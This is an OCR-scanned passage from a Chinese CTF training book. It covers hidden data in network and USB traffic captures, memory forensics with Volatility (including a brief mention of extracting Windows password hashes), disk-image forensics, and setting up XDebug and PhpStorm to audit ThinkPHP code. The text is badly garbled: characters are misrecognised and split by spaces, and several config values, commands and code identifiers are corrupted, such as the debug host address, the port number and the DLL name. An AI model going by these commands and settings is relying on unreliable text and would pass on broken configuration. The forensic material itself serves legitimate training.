议 ， 再 在 “ (Pre) -Master-Secret Log Filename” 中 填 入 密 钥 文件 的 路 径 ( 见 图 9-3-8) ， 确 定 后 
即 可 解密 部 分 SSL 流 量 。 


Secure Sockets Layer 


RSA keys list Edit... 


SSL debug file 


Browse... 


Reassemble SSL records spanning multiple TCP segments 
Reassemble SSL Application Data spanning multiple SSL records 
Message Authentication Code (MAC), ignore "mac failed" 


Pre-Shared-Key 


(Pre)-Master-Secret log filename 
/Users/acdxvfsvd/Documents/secret.txt Browse... 
图 9-3-8 
由 于 网 络 协议 的 复杂 性 ， 能 隐藏 数据 的 地 方 远 远 不 止 正常 的 传输 流程 ， 因 此 在 对 网 络 流量 包 进行 分 析 
时 ， 如 果 从 正常 方式 传输 的 数据 上 找 不 到 突破 口 ， 那 么 需要 关注 一 些 在 流量 包 中 看 似 异 常 的 协议 ,和 仔 


细 检 查 各 字段 ， 观 察 有 无 隐藏 数据 的 印迹 。 图 9-3-9 和 图 9-3-10 是 某 次 国外 CTF 比 赛 中 利用 ICMP 数 据 
报 的 长 度 来 隐藏 信息 的 例子 。 


Destination Protocol Length Info 
1925168=11:5 ICMP 129 Echo (ping) request 
192.168.11.3 129 (ping) 
192.168.11.5 143 (ping) 
192.168.11.3 143 (ping) 
192.168.11.5 91 (ping) 
192.168.11.3 91 (ping) 
192.168.11.5 141 (ping) 
192.168.11.3 141 (ping) 
192.168.11.5 153 (ping) 
192.168.11.3 153 (ping) 
192.168.11.5 151 (ping) 
192.168.11.3 151 (ping) 


图 9-3-9 
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Sequence number (BE): 499 (0x01f3) 
Sequence number (LE): 62209 (0xf301) 
R nse frame: 2 
v Data (87 bytes) 
Data: 6162636465666768696a6b6c6d6e6f707172737475767761. . ， 
[Length: 87] 


9.3.1.3 特殊 种 类 的 流量 包 分 析 


CTF 中 还 有 一 些 特殊 种 类 的 流量 分 析 ， 题 目 提 供 的 流量 包 中 并 不 是 网 络 流量 ， 而 是 其 他 类 型 的 流量 。 
本 节 将 介绍 USB 键 盘 与 鼠标 流量 的 分 析 方 法 。 


USB 流 量 包 在 Wireshark 中 的 显示 见 图 9-3-11。 在 CTF 中 ， 我 们 只 需 关注 USB Capture Data， 即 获取 

的 USB 数 据 ， 根 据 数 据 的 形式 可 以 判断 不 同 的 USB 设 备 。 关 于 USB 数 据 的 详细 文档 可 以 到 USB 的 官网 

上 获取 ， 如 https://www.usb.org/sites/default/files/documents/hut1 12v2.pdf#ghttps:// 
.Org/sites/default/files/documents/hid1 11.pdf。 a 


18 0.648067 
19 0.656070 


wwwmwwwwmwmwWwWWwWW Ww 
OM a A i i EG i no se pi 
Lo oo 








|! 
b PP PP PP PP 
SSSSSsSSSSSSSSs 


Frame 8: 35 bytes on wire (280 bits), 35 bytes captured (280 bits) 
USB URB 
eftover Capture Data: 00ff0100ffff0100 


图 9-3-11 


USB 键 盘 数 据 报 每 次 有 8 字 节 ， 具 体 含 义 见 表 9-3-1。 


由 于 正常 使 用 时 一 般 是 一 个 键 一 个 键 地 按 下 ， 因 此 只 需 天 注 第 0 字 节 的 组 合 键 状态 和 第 2 字 书 的 按键 码 
即 可 。 第 0 字 节 的 8 位 组 合 键 含义 见 表 9-3-2。 


UsB 鼠 标 数据 报 为 3 字 节 ， 具 体 售 义 见 表 9-3-3。 


表 9-3-1 


字 攻 下 标 


修改 键 ( 组 合 键 ) 
OEM 保留 


左 Ctrl 键 

左 Shift 键 

左 Alt 键 

左 Win (GUI) 键 
右 Ctrl 键 

右 Shift 键 

右 Alt 键 


主人 IN (WATTTIN 4 
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表 9-3-3 


子 节 下 标 


按 下 的 按键 , 第 0 位 为 左 
键 ， 第 1 位 为 右键 , 第 2 位 
为 中 键 


了 轴 移 动 的 长 度 
键盘 按键 的 部 分 映射 表 见 图 9-3-12 (来 自 USB 官 方 文档 ) ， 完 整 的 映射 表 可 以 到 USB 官 万 网 站 查询 。 
对 于 一 个 USB 流 量 包 ，Tshark 工 具 可 以 方便 地 获取 纯 数据 字段 : 
tshark-r filename.pcapng-T fields-e usb.capdata 


获取 数据 后 ， 根 据 前 面 的 含义 ， 利 用 Python 等 语言 ， 可 以 写 出 还 原 信息 的 脚本 ， 拿 到 1 
析 。 


Ref: Typical AT-101 

Usage ID UsageID Usage Name Position PC-MacUNI Boot 
(Dec) (Hex) AT X 

Reserved (no event indicated)9 N/A | V 4/101/104 
Keyboard ErrorRollOver9 N/A y V 4/101/104 
Keyboard POSTFail9 N/A | V 4/101/104 
Keyboard ErrorUndefined9 N/A | V 4/101/104 
Keyboard a and A4 | V 4/101/104 
Keyboard b and B | V 4/101/104 
Keyboard c and C4 | V 4/101/104 
Keyboard dand D y V 4/101/104 

| 

| 

y 

y 

y 

y 


局 


Keyboard e and E V 4/101/104 
Keyboard fand F V 4/101/104 
Keyboard g and G V 4/101/104 
Keyboard h and H V 4/101/104 
Keyboard i and | V 4/101/104 

board j V 4/101/104 


2 
3 
4 
5 
6 
7 
8 
9 


i a i i 


9.3.1.4 流量 包 分 析 小 结 


在 CTF 中 ， 流 量 包 分 析 的 题目 多 种 多 样 ， 上 面 只 是 简单 介绍 了 常见 的 考点 及 基本 解 题 思路 。 如 果 遇 到 
其 他 类 型 的 题目 ， 读 者 还 需 熟 悉 相应 协议 ， 从 中 分 析出 可 能 隐藏 信息 的 地 方 。 


9.3.2 内 存 镜像 取证 


9.3.2.1 内 和 存 镜 像 取证 介绍 


CTF 中 的 内 存 取 证 古 的 形式 为 ， 提 供 一 个 完整 的 内 存 镜像 或 一 个 核心 转 储 文件 ， 参 赛 者 应 分 析 内 存 中 
正在 执行 的 进程 等 信息 ， 解 出 自己 所 需 的 内 容 。 内 存 取 证 经 常 与 其 他 取证 配合 ， 常用 的 框 染 古 Pe 
olatili 
。 Volatility 是 由 Volatility 开 源 基金 会 推出 的 一 蒜 开 源 的 专业 内 存 取 证 工具 ， 支 持 对 Windows、 


Linux 
等 操作 系统 的 内 存 镜 像 分 析 。 


9.3.2.2 内 存 镜像 取证 常见 操作 
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当 我 们 拿 到 一 个 内 存 镜 像 时 ， 首 先 需 要 确定 这 个 镜像 的 基本 信息 ， 其 中 最 重要 的 束 是 判 凯 这 个 镜像 是 
何 种 操作 系统 的 。Volatility 工 具 提供 了 对 镜像 的 基本 分 析 功 能 ， 使 用 imageinfo 命 令 即 可 获取 镜像 的 
去 时 见 儿 9-3-13。 


得 到 镜像 信息 后 ， 我 们 便 可 使 用 某 一 具体 的 配置 文件 对 镜像 进行 操作 分 析 。 由 于 内 存 镜 像 是 计算 机 运 
行 某 一 时 间断 面 下 的 上 下 文 ， 首 先 需 要 获取 的 是 计算 机 在 这 一 时 刻 运行 了 哪些 进程 。Volatility 提 供 了 
众多 的 分 析 进 程 的 命令 ， 如 pstree、psscan、pslist 等 ， 这 些 命令 的 强度 与 输出 形式 不 一 。 图 9-3-14 
是 使 用 psscan 效 取 的 进程 信息 。 


另外 ，filescan 命 令 可 以 对 打开 的 文件 进行 扫 摘 ， 见 图 9-3-15 所 示 。 当 确定 了 内 仓 中 可 疑 的 某 个 文件 
或 进程 后 ， 可 以 使 用 dumpfile 和 memdump 命 令 将 相 天 效 据 导出 ， 然 后 对 导出 的 数据 进行 二 进 制 分 
析 。 


Screenshot 功 能 可 以 获取 系统 在 此 刻 的 截图 ， 见 图 9-3-16。 


名 9 3 lS 





图 9-3-14 


图 9-3-15 


图 9-3-16 
对 于 不 同 的 系统 ，Volatility 支 持 很 多 独 有 的 特性 ， 如 在 Windows 下 支持 从 打开 的 记事 本 进程 中 直接 
获取 文字 ， 或 Dump 出 内 存 中 含有 的 关于 Windows 登 录 的 密码 Hash 值 等 信息 。 


Volatility 支 持 第 三 方 插件 ， 有 很 多 开发 者 开发 了 功能 强大 的 插件 ， 如 https://github.com/ 本 
egekelnllei 人 二 
/volatility-plugins。 当 框架 中 自 带 的 命令 不 能 满足 需求 时 ， 不 妨 寻 找 优秀 的 插件 。 “ 


9.3.2.3 内 存 镜像 取证 小 结 


对 于 内 存 取证 类 题目 ， 只 要 我 们 熟悉 Volatility 工 具 的 常用 命令 ， 并 能 够 对 结合 其 他 类 型 的 知识 (如 图 
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片 隐 写 、 压 缩 包 分 析 等 ) 对 提取 出 的 文件 进行 分 析 ， 便 可 轻松 解决 。 


9.3.3 磁盘 镜像 取证 


9.3.3.1 磁盘 镜像 取证 介绍 

CTF 中 的 磁盘 取证 题 一 般 会 提供 一 个 未 知 格式 的 磁盘 镜像 ， 参 赛 者 需要 分 析 使 用 者 留 下 的 使 用 痕迹 ， 
找 出 隐藏 的 数据 。 由 于 磁盘 取证 是 基于 文件 的 分 析 ， 因 此 经 单 与 其 他 考察 取证 的 方向 一 起 出 现 ， 并 且 
更 接近 真实 的 取证 工作 。 相 比 内 存 取 证 ,磁盘 取证 的 信息 量 一 般 更 大 ， 不 过 由 于 包含 的 信息 更 多 ， 对 
使 用 者 具体 使 用 轨迹 的 定位 也 相对 容易 。 磁 盘 取 证 一 般 不 需要 专门 的 软件 ， 除 非 是 一 些 特殊 格 式 的 磁 
盘 镜像 ， 如 VMWare 的 VMDK 或 Encase 的 EWF 等 。 


9.3.3.2 磁盘 镜像 取证 常见 操作 


与 内 存 取 证 类 似 ， 磁 盘 取 证 的 第 一 步 也 是 确定 磁盘 的 类 型 ， 并 挂 载 磁盘 ， 可 以 通过 UNIX/Linux 自 带 
的 file 命 令 来 完成 ， 见 图 9-3-17。 


图 9-3-17 
确认 类 型 后 ， 可 以 使 用 “fdisk-|” 命令 得 看 磁盘 中 的 卷 信息 ， 获 取 各 郑 的 类 型 、 含 移 量 等 ， 见 图 9-3- 
18。 然 后 可 以 使 用 “mount ”命令 将 磁盘 镜像 挂 载 。mount 命 令 的 格式 如 下 : 


mount -9 妆 肌 -xx44%X3 tx 


图 9-3-18 
对 于 本 地 文件 的 挂 载 ， 一 般 包 括 “loop” 项 ， 如 果 是 如 上 文 所 述 的 多 分 区 镜像 ， 那 么 需要 加 上 Sn 
”项 并 指定 其 值 。 如 果 是 非 系统 原 生 支 持 的 文件 系统 ， 那 么 需要 安装 相关 的 驱动 程序 ， 如 Linux 下 
挂 载 NTFS 文 件 系统 需要 安 六 NTFS-3g 驱 动 程序 。 成 功 挂 载 后 的 文件 夹 见 图 9-3-19，。 


t 


图 9-3-19 
挂 载 完 毕 ， 出 题 人 在 制作 镜像 时 一 定 会 在 文件 系统 中 进行 操作 ， 那 么 即 可 按照 普通 的 取证 步骤 ， 对 文 
件 系 统 中 的 使 用 痕迹 进行 分 析 。 例 如 ， 在 Linux 文 件 系 统 中 的 “.bash_history” 文 件 和 和 Windows 下 
的 Recent 文 件 夹 中 会 存在 对 文件 系统 的 操作 历史 记录 ， 见 图 9-3-20。 
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图 9-3-20 
在 获取 到 可 疑 的 文件 后 ， 即 可 提取 出 来 进行 二 进 制 分 析 。 大 部 分 情况 下 ， 可 疑 文件 本 身 会 使 用 其 他 的 
信息 隐藏 技 术 ， 如 隐 写 术 等 。 
还 有 一 些 磁盘 镜像 取证 类 型 题目 主要 考查 某 些 文件 系统 独特 的 特性 ， 如 EXT 系 列 文 件 系 统 的 inode 恢 


复 、FAT 系 列 文件 系 统 中 的 FAT 表 恢复 ，APFS 文 件 系 统 的 快照 特性 和 纳 秒 级 时 间 截 特性 等 。 当 对 文件 
的 分 析 过 到 尊 贷 时 ， 不 妨 了 解 文 件 系统 本 身 的 特性 ， 以 此 来 寻找 突破 口 。 


9.3.3.3 磁盘 镜像 取证 小 结 


磁盘 取证 类 题目 其 实 与 内 人 存 取证 题目 类 似 ， 往 往 与 压缩 包 分 析 、 图 片 隐 写 等 类 型 的 题目 结合 。 只 要 参 
赛 者 熟悉 常见 的 镜像 ， 能 够 判断 出 镜像 种 类 并 挂 载 或 提取 出 文件 ， 册 配合 对 文件 系统 的 一 定 了 解 ， 便 
可 以 顺利 地 解决 硬盘 取证 相关 的 题目 。 
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小 结 


随 着 CTF 的 不 断 友 展 ，Misc 类 型 的 题目 考察 的 知识 点 越 来 越 广泛 ， 相 对 于 几 年 前 单纯 的 图 片 隐 写 ， 难 
度 也 越 来 越 高 。 由 于 篇 幅 所 限 ， 本 章 只 是 简单 介绍 了 几 种 在 CTF 中 出 现 频 率 较 高 的 套路 化 题目 。 正 如 
本 章 引言 中 所 写 ， 在 高 质量 的 比赛 中 ， 除 了 本 章 介绍 的 套路 化 题目 类 型 ， 参 赛 者 往往 会 遇 到 的 很 多 这 
奇 的 题目 ， 这 些 题 目 或 是 考察 参赛 者 知识 的 深度 和 广度 ， 或 是 考察 参赛 者 的 快速 学 习 能 力 。 这 些 需 要 
参赛 者 具有 一 定 计 算 机 专业 知识 ， 同 时 需要 借助 搜索 引擎 搜索 、 阅 读 大 量 资料 ， 通 过 快速 学 习 来 解决 
y= 
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第 10 草 代码 审计 


Sl = 
码 审 计 的 本 质 是 友 现 代码 中 存在 的 缺陷 ， 本 章 只 以 主流 的 PHP 和 Java 代 码 审 计 为 例 ， 让 读者 不 仪 对 _ 
中 的 代码 审计 题目 有 所 了 解 ， 还 可 以 积累 现实 世界 代码 审计 的 一 些 经 验 。 


书城 目录 
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10.1 PHP 代 码 审计 


10.1.1 环境 搭建 


俗话 说 : “ 工 欲 善 其 事 必 先 利 其 器 ”， 在 正式 审计 PHP 代 码 前 ， 需 要 先 将 所 需 的 工具 和 环境 准备 好 ， 
这 样 审计 时 才能 事半功倍 。 


PHP 代 码 审计 主要 分 为 静态 分 析 和 动态 分 析 两 种 方式 : 


作 静态 分 析 是 在 不 运行 PHP 代 码 的 情况 下 ， 对 PHP 源 码 进行 查看 分 析 ， 从 中 找 出 可 能 存在 的 
缺陷 和 漏洞 。 


人 动态 分 析 是 将 PHP 代 码 运行 起 来 ， 通 过 观察 代码 运行 的 状态 ， 如 变量 内 容 、 函 数 执行 结果 
等 ， 达 到 明确 代码 流程 ， 分 析 函 数 逻 辑 等 目的 ， 并 从 中 挖掘 出 漏洞 。 


因为 动态 调试 的 技巧 较 多 ， 所 以 本 节 以 动态 调试 为 例 ， 下 面 详 细 襄 明 如 何 搭建 动态 调试 环境 。 


首先 ， 安 装 PHP。 因 为 PHP 的 一 键 集成 式 环境 很 多 ， 如 xampp、phpstudy、mamp 等 ， a 

， 读 者 可 以 根据 自己 喜好 自行 选择 。 安 装 好 PHP 后 ， 开 始 安装 XDebug， 用 于 动态 分 析 的 扩 县 
(读者 可 以 去 XDebug 的 官网 https://xdebug.org/download.php 下 载 适 合 自己 平台 和 PHP 版 本 的 
版 本 ) 。 


注意 ， 如 果 XDebug 版 本 与 本 地 环境 不 匹配 ， 则 可 能 报错 ， 如 果 无 法 确定 XDebug 的 版 本 或 者 不 知道 

安装 方法 ， 可 以 访问 https://xdebug.org/wizard.php ( 见 图 10-1-1) ， 然 后 在 浏览 器 中 访问 本 地 

环境 的 phpinfo 页 面 ( 见 图 10-1-2) 。 把 phpinfo 的 输出 全 部 粘贴 到 图 10-1-1 的 文本 框 中 ， 单 击 
my phpinfo(output ”按钮 ， 束 可 以 看 到 XDebug 给 出 的 安装 指南 ， 见 图 10-1-3。 


然后 下 载 图 10-1-3 给 出 的 DLL 文件 并 放 到 PHP 目 录 的 ext 目 录 下 ， 再 修改 php.ini 文 件 。 打 开 php.ini 文 
件 ， 在 未 尾 加 上 如 下 内 容 : 


[XDebug] 
;性 能 分 析 信 息 文件 的 输出 目录 《根据 实际 环境 做 更 改 》 
debug.profiler_output_dir="C:\phpStudy\PHPTutorial\tmp\xdebug" 


If you find Xdebug useful, please consider supporting the project. 


Installation Wizard 


This page helps you finding which file to download, and how to configure PHP to 
get Xdebug running. Please paste the full output of phpinfo() (either a copy & 
paste of the HTML version, the HTML source or php -i output) and submit the 
form to receive tailored download and installation 


The information that you upload will not be stored. The script will only use a few 
regular expressions to analyse the output and provide you with instructions. You 
can see the code here. 
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i Oct 14 2016 10:15:39 


MSVCI11 (Visual C++ 2012) 


cscript /nologo configure.js "~-enable-snapshot-build" "-—enable-debug-pack" "-—disable—zts" "— 
disable-isapl" "~~disable-nsapi" "~~-without-mssql" "~-—Wwithout-pdo-mssal" "~——-without-pl3web" "——-with— 
pdo-oci=c:\php-sdk\oracie\x86\instantclient_12_1\sdk,shared” "——with-oci8-12c=c:\php— 
sdk\oracle\x86\instantclient_12_1\sdk,shared" "~—with-enchant=shared" "一 -enable-object-out-dir=../obj/" 
“~~enNable-com-dotnet=shared" "~~-with-mcrypt=static" "~~-without~analyzer” "—-with-pgo”™ 











| Server API 

ER [i | 
[ET 
oved Conoration ri 


Scan this dir for additional .ini files 
Additional .ini files parsed 
PHP API 














PHP Extension 





Zend Extension 


Zend roraon utd 
图 10-1-2 








r 





UMMARY 


» Xdebug installed: no 
。 Server API: CGI/FastCGI 
。 Windows: yes - Compiler: MS VC14 - Architecture: 
X86 
。 Zend Server: no 
。 PHP Version: 7.1.13 
。 Zend API nr: 320160303 
。 PHP API nr: 20160303 
。 Debug Build: no 
。 Thread Safe Build: no 
。 OPcache Loaded: no 
。 Configuration File Path: C:\Windows 
。 Configuration File: C:\phpStudy\PHPTutorial\php\php-7.1.13-nts\php.ini 
。 Extensions directory: C:\phpStudy\PHPTutorial\php\php-7.1.13-nts\ext 


INSTRUCTIONS 


1. Download php_xdebug-2.7.2-7.1-vc14-nts.dll 
2. Move the downloaded file to C:\phpStudy\PHPTutorial\php\php-7.1.13-nts\ext 


3. Edit C:\phpStudy\PHPTutorial\php\php-7. 1. 13-nts\php. ini and add the line 


zend_extension = C:\phpStudy\PHPTutorial\php\php-7. 1. 13-nts\ext\php_xdebug-2. 7. 2-7. 1-vcl4-nts. dll 


4. Restart the webserver 
图 10-1-3 


; 堆栈 跟踪 文件 的 存放 目录 【根据 实际 环境 做 更 改 ) 
xdebug.trace_output_dir="C:\phpstudy\PHPTutorial\tmp\xdebug" 
; xdebug 库 文件 (根据 实际 环境 做 更 改 ) 

zend_extension = "C:\phpstudy\PHPTutorial\php\php-7.1.13-nts\ext\php_xdebug-2.7.2-7.1-vcld-nts.dLlL" 
; 开局 远程 调试 

xdebug.remote_enable = On 

: IP 地 址 

xdebug.remote_host="]127.0.8.1" 

; Xxdebug 监听 端口 和 调试 协议 

xdebug.remote_port=9880 

xdebug .remote_handLlLer=dbgp 

; idekey 

xdebug.idekey="PHPSTORM" 

xdebug.profiler_enable = On 

xdebug.auto_trace=On 

xdebug.collect_params=0On 

xdebug.collect_return=0n 


保存 该 文件 ， 并 重启 Apache， 查 看 phpinfo 页 面 ， 搜 索 “xdebug” 关 键 词 ， 如 果 出 现 了 图 10-1-4 所 
示 的 内 容 ， 则 说 明 配 置 成 功 。 


XDebug 环 境 配 置 后 ， 我 们 需要 下 载 PhpStorm 来 配合 使 用 (具体 安装 方法 读者 可 自行 查阅 ) 。 安 装 
完毕 ， 运 行 PhpStorm， 选 择 “Configure 一 Settings” ( 见 图 10-1-5) ， 然 后 选择 “Languages& 
Frameworks 一 PHP 一 Debug”， 设 置 调试 端口 为 9000 ( 见 图 10-1-6) 。 


展开 左 侧 的 Debug 选 项 ， 配 置 DGBp Proxy。 “IDE key” 处 填写 与 php.ini 中 一 致 的 内 容 ， 即 a 
”，“Host” 处 填写 “127.0.0.1”，“Port” 处 填写 “9000”， 见 图 10-1-7。 


xdebug support | 
Version 2.72 
IDE Key PHPSTORM 
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PhpStorm 


Version 2019.1.2 


十 Create New Project 
启 Open 
Ll Create New Project from Existing Files 


片 Check out from Version Control 


ure Get Hel 


| Run Configuration Templates for New Projects 
Import Settings 


图 10-1-5 


4. Start debug session in browser with the toolbar or bookmarklets. 
For more information follow Zero-configuration Debugging tutorial. 


Y Languages & Frameworks 
> JavaScript 风 


加 
A External connections 


DIgnore external connections through unregistered server configurations 


Composer 
口 Break at first line in PHP scripts 


Test Frameworks 
Quality Tools 
Phing 
Smarty 

> Schemas and DTDs 


Max. simultaneous connections: 3 号 | 


Xdebug 


Debug port: 9000 回 Can accept external connections 


Markdown 
Nodejs and NPM 
ReStructured Text 


回 Force break at first line when no path mapping specified 
回 Force break at first line when a script is outside the project 


吕 Zend Debugger 
1g 1 6 


| Languages & Frameworks » PHP » Debug » DBGp Proxy 


> Stvle Sheets 


For new projects 
Host: «|127.0.0.1 


Port: 
图 10-1-7 
准备 工作 完成 后 ， 开 始 调 试 。 用 PhpStorm 打 开 一 个 本 地 的 PHP 网 站 ， 这 里 以 自 带 的 phpmyadmin 为 


例 ， 选 择 “File 一 Settings 一 Languages&Frameworks 一 PHP 一 Servers”。 单 击 “+”， 添 加 一 
个 服务 器 ， 设 置 本 机 实际 环境 ， 见 图 10-1-8。 


Languages & Frameworks ) PHP ) Servers 
+ 一 申 迪 
127001 


Name: 127.00.1 
Host 
127001 
口 Use path mappings (select if the server is remote or symlinks are used) 


图 10-1-8 
在 PhpStorm 中 查看 phpmyadmin 文 件 夹 中 的 index.php， 在 第 一 行 设置 断 点 ( 单 击 该 行 左边 ， 即 可 
添加 或 取消 断 点 ) ， 见 图 10-1-9。 单 击 右 上 角 的 “Add Configurations” 按 钮 ， 见 图 10-1-10。 然 
后 单 击 “+”， 和 选择 “PHP Web Application” 或 “PHP Web Page”， 见 图 10-1-11。 


* Gets core Jibraries and defines some variables 
关 


3 


require once ’./libraries/common. inc. php” : 


图 10-1-9 
Add Configuration.. | > 益 中 8 国 巴 名 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek32b321d024832bb90e89958 








2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读书 
图 10-1-10 
设置 起 始 地 址 ， 因 为 phpmyadmin 在 phpstudy 的 二 级 目录 下 ， 因 此 填写 /phpmyadmin”， 见 医 
10-1-12。 


单 击 右上 角 的 调试 按钮 ， 见 图 10-1-13。Phpstorm 会 自动 调用 浏览 器 打开 网 页 ， 并 在 代码 断 点 处 停 
止 ， 输 出 当前 的 一 些 信息 ， 见 图 10-1-14。 然 后 通过 图 10-1-15 中 的 一 排 按钮 就 可 以 进行 调试 了 。 


当然 ， 这 样 做 还 是 不 够 方便 ， 不 能 很 好 地 与 浏览 器 联动 。 这 里 推荐 使 用 Firefox 浏 览 器 的 Xdebug 
插件 进行 调试 。 


el 


Add New Configuration 
[3 Attach to Node.js/Chrome 
B Behat 
€ Codeception 
Compound 
Docker 
@ Firefox Remote 
僻 Gruntjs 
看 Gulpjs 
Rt HTTP Request 
这 JavaScript Debug 
Jest 
@ Mocha 
(I Nodejs 
($Y Nodeunit 
0D npm 
息 NWjs 
志 , PHP Built-in Web Server 
BPHP HTTP Request 
部 bPHP Remote Debug 
2 PHP Script 


图 10-1-11 


Name: | phpmyadmin| 器] Share [|] Allow parallel run 


Configuration 


server |127.001 ~||..| 
Start URL: /phpmyadmin 忆 z 


http://127.0.0.1/phpmyadmin 


Browser: | @ Default ~ 图 


v Debug pre-configuration 
1. Install Xdebug or Zend Debugger on the Web Server. 
Validate debugger configuration on the Web Server. 
2. Start "PHP Web Page" run-configuration. 


v Before launch: Activate tool window 
- bo 


There are no tasks to run before launch 


[LL] Show this page [MV Activate tool window 
10-1-12 
EE OO 


as phpmyadmin ~v| > 次 是 和 


区 0 
d defines some variables 


Iree the SessiOonN I1i€, iC 
Session write_close(); 


Gets the host name Vsearchfor: 1 | 2 | 
if (empty (SHTTP_HOST)) { +|> =$-COOKIE = {array} [4] 
if (PMA_getenv (var name: "HTTP_HOST' )) 1 
SHTTP_HOST = PMA_getenv(var_name: ”HTTP | 
) else { 
SHTTP_HOST = ”“ : 


国 XDEBUG_SESSION_START = "17717" 
~ 》 1 $_REQUEST = {array) [1] 
一 : 一 - 上 EAAY 


AS Ime cernurn 一 二 一 
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| SOLOBALS em 9 
图 10-1-14 


图 10-1-15 
首先 ， 在 Firefox 浏 览 器 的 扩展 中 心 搜索 “Xdebug Helper” ， 找 到 后 添加 ， 见 图 10-1-16。 更 改 ee 
Helper 的 选项 配置 , 将 “IDE key” 的 内 容 改 为 “PHPSTORM”， 见 图 10-1-17。 保 存 完毕 。 
继续 访问 http://127.0.0.1/phpmyadmin， 在 用 户 名 和 密码 处 输入 内 容 ， 并 将 Xdebug Helper 调 至 
Debug 模 式 ， 见 图 10-1-18。 然 后 回 到 Phpstorm， 将 右上 角 的 电话 图 标 开 局 ， 见 图 10-1-19。 


、 Xdebug Helper for Firefox & 18,804 个 用 户 
This extension is very useful for PHP developers that are using PHP tools with 

Xdebug support like PHPStorm, Eclipse with PDT Netbeans and MacGDBp or any 

other Xdebug compatible profiling tool like KCacheGrind, WinCacheGrind or 

Webgrind. 

会 会 会 会 计 BrianGilbert_ 


图 10-1-16 
Xdebug helper 


Easy debugging, profiling and tracing 


Introduction 


First install and configure Xdebug, then set your IDE key below. Now tell Xdebug to debug, 
profile or trace by clicking the little bug in the addressbar: 


着 Debugging, profiling & tracing disabled 
状 Debugging enabled 

© Profiling enabled 

QB Tracing enabled 


Use Ctrl+Shift+X (Cmd+Shift+X on Mac) to open thie popup or Alt+Shift+X to toggle the 
debugging state. 


IDE key 
Select your IDE to use the default sessionk®y or choose other to use a custom key. 
PhpStorm ~ PHPSTORM ‘Save 


Trace Trigger Value 


图 10-1-17 


ph drmin 
欢迎 使 用 phhpMyAdmin 


0 #1045 无 法 登录 MySQL 服务 器 


| 语言 - Language | 


中 文 - Chinese simplified -| 


图 10-1-18 


> 关 0) 
图 10-1-19 
回 到 Firefox 浏 览 器 ， 单 击 “ 登 录 ” 按 钮 ， 会 自动 跳 到 phpstorm 中 的 断 点 位 置 ， 同 时 显示 输入 的 用 户 
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名 和 密码 ， 见 图 10-1-20。 


> 涝 S.COoOKIE = {array} [5] 


图 10-1-20 
人 至此， 动态 调试 环境 搭建 完毕 。 


10.1.2 审计 流程 

相信 很 多 人 在 入 门 代码 审计 的 时 候 经 党 会 有 这 样 的 困 隔 : 获得 源码 后 要 怎么 审计 ， 从 哪里 入 手 ， 怎 么 
才能 有 效 、 快 速 地 找到 漏洞 ; 框架 的 代码 比较 星 浊 难 懂 ， 起 么 做 到 快速 、 有 效 地 阅读 框架 路 由 。 下 面 
以 Thinkphp 5.0.24 核 心 版 为 例 来 讲解 快速 阅读 框架 路 由 的 方法 。 

在 Thinkphp 官 网 (http://www.thinkphp.cn/down/1279.html) 下 载 Thinkphp 5.0.24 核 心 版 代 


码 ， 其 源码 结构 见 图 10-1-21。 其 中 ，vendor 是 第 三 方 类 库 目录 ，thinkphp 是 框架 系统 目录 ， 
是 运行 时 目录 ，public 是 web 部 署 目 录 ，extend 是 扩展 类 库 目录 ，application 是 应 用 目录 。 


runtime 


thinkphp_5.0.24 


图 10-1-21 
开始 审计 的 时 候 ， 需 要 移 找 到 程序 的 入 口 点 。 通 弟 情 况 下 ， 程 序 的 入 口 点 是 index.php。 因 此 在 阅读 
源码 的 时 候 单 从 index.php 入 手 。 而 Thinkphp 的 index.php 在 Public 文 件 夹 下 ， 通过 PhpStorm 打 开 ws 
inkphp 
_5.0.24 文 件 夹 ， 然 后 展开 public 目 录 ， 找 到 index.php 并 打开 ， 代 码 如 下 。 


?php 
// 定义 应 用 目录 
define('APP_PATH', __DIR__ . '/../application/'); 
// 加 载 框架 引导 文件 
require __DIR__ . '/../thinkphp/start.php'; 


入 口 点 的 代码 很 简洁 ， 并 且 给 出 了 注释 。 此 处 包含 了 start.php， 所 以 接 下 来 需要 跟踪 查看 start.php 
中 的 内 容 (在 PHP 审 计 过 程 中 ， 如 果 有 文件 包含 ， 一 般 需 要 跟踪 进去 查看 ) 。 


在 Phpstorm 中 可 以 自动 跟 入 包含 的 文件 。 右 键 单 击 该 包含 文件 ， 在 弹出 的 快捷 菜单 中 选择 “Go To 
一 Decralation” ( 见 图 10-1-22) ， 即 可 自动 跳 到 start.php， 读 者 也 可 以 使 用 图 10-1-22 中 相应 的 
快捷 键 来 操作 。 下 文 追踪 函数 时 也 可 以 同样 用 快捷 键 来 追踪 ， 会 更 加 方便 。 


start.php 中 的 代码 如 下 : 
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Declaration 


图 10-1-22 


<?php 
namespace think; 
// ThinkPHP 引导 文件 
// 1， 加 载 基础 文件 
require __DIR__ . '/base.php'; 
// 2. 执行 应 用 
App: :run()->send(); 


此 处 代码 包含 了 base.php 文 件 ， 继 续 跟踪 查看 。 核 心 代码 如 下 : 


<?php 
// 一 些 define 定义 常量 操作 
// 加 载 .env 环境 变量 
// 注册 自动 加 载 
\think\Loader: :register(); 
// 注册 错误 和 异常 处 理 机 制 
\think\Error: :register(); 
// 加 载 惯例 配置 文件 
\think\Config: :set(include THINK_PATH.'convention' .EXT); 


这 里 需要 理解 \think\Loader::register() 函 数 的 调用 ， 继 续 跟踪 查看 : 


public static function register($autoload = null) { 
// 注册 系统 自动 加 载 
spl_autoload_register($autoload ?: 'think\\Loader::autoload', true, true); 
// Composer 自动 加 载 支 持 
if (is_dir(VENDOR_PATH.'composer')) { 
if (PHP_VERSION_ID >= 506060 && is_file(VENDOR_PATH.'composer' .DS.'autoload_static.php')) { 
require VENDOR_PATH.'composer' .DS.'autoload_static.php'; 
$declaredClass = get_declared_classes(); 
$composerClass = array_pop($declaredClass); 
foreach(['prefixLengthspsr4', 'prefixDirspsry', 'fallbackDirsPpsry', 
'prefixespsre', 'fallbackDirspsr@', 'classMap', 'files'] as $attr) { 
if (property_exists($composerClass, $attr)) { 
self::${$attr} = $composerClass::${$attr}; 
} 
} 


} 
else { 
self::registerComposerLoader(); 


} 

// 注册 命名 空间 定义 

self::addNamespace(['think' => LIB_PATH.'think' .DS, 
'behavior' => LIB_PATH. 'behavior' .DS, 
'traits' => LIB_PATH.'traits' .DS 

J); 

// 加 载 类 库 映 射 文件 

if (is_file(RUNTIME_PATH.'classmap' .EXT)) { 

